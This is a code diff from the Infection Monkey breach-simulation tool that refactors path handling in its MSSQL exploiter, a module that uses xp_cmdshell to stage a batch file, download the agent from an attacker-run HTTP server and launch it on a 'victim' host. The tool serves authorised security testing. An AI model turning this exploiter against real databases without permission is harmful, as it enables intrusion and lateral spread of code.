diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 453e875ca..4f9608acb 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,6 +1,5 @@ import logging -import os -from pathlib import PurePath +from pathlib import PureWindowsPath from time import sleep import pymssql @@ -31,7 +30,7 @@ class MSSQLExploiter(HostExploiter): # Temporary file that saves commands for monkey's download and execution. TMP_FILE_NAME = "tmp_monkey.bat" - TMP_DIR_PATH = "%temp%\\tmp_monkey_dir" + TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir" MAX_XP_CMDSHELL_COMMAND_SIZE = 12800 @@ -49,9 +48,7 @@ class MSSQLExploiter(HostExploiter): super().__init__() self.cursor = None self.agent_http_path = None - self.payload_file_path = os.path.join( - MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME - ) + self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME def _exploit_host(self) -> ExploiterResultData: """ @@ -109,7 +106,7 @@ class MSSQLExploiter(HostExploiter): return self.exploit_result def run_payload_file(self): - file_running_command = MSSQLLimitedSizePayload(self.payload_file_path) + file_running_command = MSSQLLimitedSizePayload(str(self.payload_file_path)) return self.run_mssql_command(file_running_command) def create_temp_dir(self): @@ -133,7 +130,7 @@ class MSSQLExploiter(HostExploiter): raise Exception("Couldn't execute MSSQL exploiter because payload was too long") self.run_mssql_commands(array_of_commands) - def run_monkey(self, monkey_path_on_victim: PurePath): + def run_monkey(self, monkey_path_on_victim: PureWindowsPath): monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) logger.debug( f"Launching the agent: {monkey_launch_command.prefix} -- " @@ -148,7 +145,7 @@ class MSSQLExploiter(HostExploiter): self.cursor.execute(cmd) sleep(MSSQLExploiter.QUERY_BUFFER) - def upload_monkey(self, monkey_path_on_victim: PurePath): + def upload_monkey(self, monkey_path_on_victim: PureWindowsPath): monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim) self.run_payload_file() self.add_executed_cmd(monkey_download_command.command) @@ -164,7 +161,7 @@ class MSSQLExploiter(HostExploiter): ) self.run_mssql_command(tmp_dir_removal_command) - def start_monkey_server(self, monkey_path_on_victim: PurePath) -> LockedHTTPServer: + def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer: self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.host, str(monkey_path_on_victim), self.agent_repository ) @@ -175,12 +172,12 @@ class MSSQLExploiter(HostExploiter): http_thread.stop() http_thread.join(LONG_REQUEST_TIMEOUT) - def write_download_command_to_payload(self, monkey_path_on_victim: PurePath): + def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath): monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim) self.run_mssql_command(monkey_download_command) return monkey_download_command - def get_monkey_launch_command(self, monkey_path_on_victim: PurePath): + def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): # Form monkey's launch command monkey_args = build_monkey_commandline( self.host, self.current_depth - 1, monkey_path_on_victim @@ -193,7 +190,7 @@ class MSSQLExploiter(HostExploiter): suffix=suffix, ) - def get_monkey_download_command(self, monkey_path_on_victim: PurePath): + def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath): monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) )